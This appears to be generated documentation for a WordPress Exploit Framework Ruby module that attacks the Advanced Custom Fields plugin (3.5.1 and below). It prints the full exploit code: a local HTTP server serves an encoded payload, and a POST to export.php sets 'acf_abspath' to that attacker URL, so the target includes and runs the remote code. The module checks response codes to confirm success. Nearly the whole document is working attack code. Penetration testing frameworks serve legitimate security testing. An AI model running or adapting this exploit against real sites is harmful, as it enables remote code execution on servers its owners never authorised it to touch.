class Wpxf::Exploit::AdvancedCustomFieldsRemoteFileInclusion

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Net::HttpServer::new
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 7
def initialize
  super

  update_info(
    name: 'Advanced Custom Fields Remote File Inclusion',
    desc: 'The Advanced Custom Fields plugin, in versions 3.5.1 and below, '\
          'allows for remote file inclusion and remote code execution via '\
          'the export.php script. This exploit only works when the PHP '\
          'option "allow_url_include" is enabled (disabled by default).',
    author: [
      'Charlie Eriksen <charlie[at]ceriksen.com>', # Vulnerability disclosure
      'rastating'                                  # WPXF module
    ],
    references: [
      ['URL', 'http://secunia.com/advisories/51037/'],
      ['WPVDB', '6103']
    ],
    date: 'Nov 14 2012'
  )

  register_options([
    StringOption.new(
      name: 'rfi_host',
      desc: 'The address of the host listening for a connection',
      required: true
    ),
    StringOption.new(
      name: 'rfi_path',
      desc: 'The path to access via the remote file inclusion request',
      default: Utility::Text.rand_alpha(8),
      required: true
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 46
def check
  check_plugin_version_from_readme('advanced-custom-fields', '3.5.2')
end
on_http_request(path, params, headers) click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 62
def on_http_request(path, params, headers)
  payload.encoded
end
plugin_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 42
def plugin_url
  normalize_uri(wordpress_url_plugins, 'advanced-custom-fields')
end
rfi_host() click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 50
def rfi_host
  normalized_option_value('rfi_host')
end
rfi_path() click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 54
def rfi_path
  normalized_option_value('rfi_path')
end
rfi_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 58
def rfi_url
  "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}"
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 70
def run
  return false unless super

  start_http_server(true)

  emit_info 'Executing request...'
  res = execute_post_request(
    url: vulnerable_url,
    body: {
      'acf_abspath' => rfi_url
    }
  )
  stop_http_server

  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{res.body}", true

  if res.code == 500 || res.body =~ /allow_url_include/
    emit_error 'allow_url_include appears to be disabled'
    return false
  end

  if res && res.code == 200 && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  true
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb, line 66
def vulnerable_url
  normalize_uri(plugin_url, 'core', 'actions', 'export.php')
end